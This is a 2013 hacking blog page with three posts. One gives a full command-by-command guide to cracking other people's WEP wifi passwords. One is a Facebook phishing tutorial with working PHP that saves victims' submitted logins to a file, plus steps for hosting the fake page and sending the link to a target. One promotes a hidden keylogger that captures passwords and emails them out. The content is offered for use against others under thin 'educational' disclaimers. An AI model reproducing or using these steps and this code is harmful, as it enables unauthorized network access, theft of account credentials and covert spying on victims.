Saturday, 14 September 2013

             




Wifi networks are nowadays a best source to use free internet but they are protected. so here is trick to hack a wifi network password to use unlimited internet.


1) First we need to scan for available wireless networks.
Theres this great tool for windows to do this.. called “NetStumbler”
or Kismet
to download Netstumbler CLICK HERE

for Windows and Linux  use netstumbler

and KisMac for Mac.

The two most common encryption types are:
    1) WEP
    2) WAP

WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP
i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key
easily..
whereas

WAP is currently the most secure and best option to secure a wi-fi
network..
It can’t be easily cracked as WEP because the only way to retreive a
WAP key
is to use a brute-force attack or dictionary atack.


Here I’ll tell you how to Crack WEP
To crack WEP we will be using Live Linux distribution called
BackTrack to
crack WEP.
BackTrack have lots of preinstalled softwares for this very purpose..



The tools we will be using on Backtrack are:

Kismet – a wireless network detector
CLICK HERE TO DOWNLOAD KISMET

airodump – captures packets from a wireless router
CLICK HERE TO DOWNLOAD AIRDUMP

aireplay – forges ARP requests
CLICK HERE TO DOWNLOAD AIREPLAY

aircrack – decrypts the WEP keys
CLICK HERE TO DOWNLOAD AIRCRACK


1) First of all we have to find a wireless access point along with its
bssid, essid
and channel number. To do this we will run kismet by opening up
the terminal
and typing in kismet. It may ask you for the appropriate adapter
which in my
case is ath0. You can see your device’s name by typing in the
command
iwconfig.

2) To be able to do some of the later things, your wireless adapter
must be put
into monitor mode. Kismet automatically does this and as long as
you keep it
open, your wireless adapter will stay in monitor mode

3) In kismet you will see the flags Y/N/0. Each one stands for a
different type
of encryption. In our case we will be looking for access points with
the WEP
encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).

4) Once you find an access point, open a text document and paste in
the
networks broadcast name (essid), its mac address (bssid) and its
channel
number. To get the above information, use the arrow keys to select
an access
point and hit <ENTER> to get more information about it.

5) The next step is to start collecting data from the access point with
airodump. Open up a new terminal and start airodump by typing in
the
command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
In the above command airodump-ng starts the program, the channel
of your
access point goes after -c , the file you wish to output the data goes
after -w ,
and the MAC address of the access point goes after –bssid. The
command ends
with the device name. Make sure to leave out the brackets.

6) Leave the above running and open another terminal. Next we will
generate
some fake packets to the target access point so that the speed of the
data
output will increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid]
[device]
In the above command we are using the airplay-ng program. The -1
tells the
program the specific attack we wish to use which in this case is fake
authentication with the access point. The 0 cites the delay between
attacks, -a
is the MAC address of the target access point, -h is your wireless
adapters MAC
address, -e is the name (essid) of the target access point, and the
command
ends with the your wireless adapters device name.

7) Now, we will force the target access point to send out a huge
amount of
packets that we will be able to take advantage of by using them to
attempt to
crack the WEP key. Once the following command is executed, check
your
airodump-ng terminal and you should see the ARP packet count to
start to
increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack
which in
this case is packet injection, -b is the MAC address of the target
access point, -h
is your wireless adapters MAC address, and the wireless adapter
device name
goes at the end.

Once you have collected around 50k-500k packets, you may begin
the
attempt to break the WEP key. The command to begin the cracking
process is:
aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack
mode, the -b
is the targets MAC address, and the -n 128 tells the program the
WEP key
length. If you don’t know the -n , then leave it out. This should crack
the WEP
key within seconds. The more packets you capture, the bigger
chance you
have of cracking the WEP key.


FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THIS.

Friday, 13 September 2013

Hacking Facebook Acount Using Phishing






I AM NOT RESPONSIBLE FOR WHAT U DO WITH THIS
























So now i am starting to show you how to hack someone by phishing...




STEP 1: Go to Facebook

Right click on the grey space of the front page under the logo. (facebook login page)




"View Page source".

Copy the code to Notepad. not wordpad


STEP 2: Now find (Press ctrl +f) for "action=" in that code.

You fill find the code like this:







You have to change two things in that code..first of all you have to change method from POST to Get...as You can see in picture.

and secondly you have to change ACTION from https://login.facebook.com/login.php"

to "next.php"


Save the document as index.html




& Change the file type as All Files.


STEP 3:




Now we need to create the "next.php" to store the password. so open the notepad and type the code given below:

:







<?php

header("Location: http://www.Facebook.com/login.php ");

$handle = fopen("pswrds.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>




save this file as "next.php"


Step 4:




open the notepad and Now create a blank file and named it as "passwords.txt".

Now onwards You have three files..first is "index.html".Second is "next.php" and third is "passwords.txt"

Now we have to upload this three files on a php web hosting service.

many sites offers this kind of hosting services.but maximum of them are now stopped these services cause of use of them in hacking.others are still running but they are Providing paid services only.







so guys there are only few sties like 000webhost.com On internet , which is an industry leader in providing top class free web hosting services without advertising! There are no hidden costs, no adverts, and no restrictive terms. and there are only some sites which allows our phishing page

So now lets come to topic again...


STEP 5: Go to on free webhost eg:- 000webhost




other website may identify the page




and click on sign up. and select any domain name eg :- xxxxxxxx.site88.com


STEP 6:After doing above steps you have to verify your mail account that you used at the time of signup process.Verify your mail account.


STEP 7:Click on the site link which is shown under DOMAIN section to go to your control panel alternativly You can go to

http://members.000webhost.com/

for fake page uploading.


STEP 8: Now when you are logged into your account click on the Go to Cpanel in front of your domain that you had registered,










and then Go to File Manager under Files and log into it.







STEP 9: After logging to Your File manager Section. Now Click on the Public_html directory.







STEP 10: Before proceeding to next delete default.php under public_html directry.Now click on the Upload button, choose the three file that we created earlier.(index.html, next.php and passwords.txt).





STEP 11: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwords.txt" file.










STEP 12: Now Everything is set. The Only thing that we have to do is that pass the link to victim.after that if he/she login through that link then we are able to get his/her account and password.


FOR EDUCATION PURPOSE ONLY !!!

Keylogger Tutioral


Tools

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.
Security - allows you to protect program settings, Hidden Mode and Log file.
Application monitoring - keylogger will record the application that was in use that received the keystroke!
Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
It records every keystroke. Captures passwords and all other invisible text.
Other Features: 
Windows 2000/2003/XP/Vista/Windows 7 support
Monitors multi-user machines
Automatic startup
Friendly interface
Easy to install

Download Link: http://download.cnet.com/Ardamax-Keylogger/3000-2162_4-10353737.html?tag=mncol;1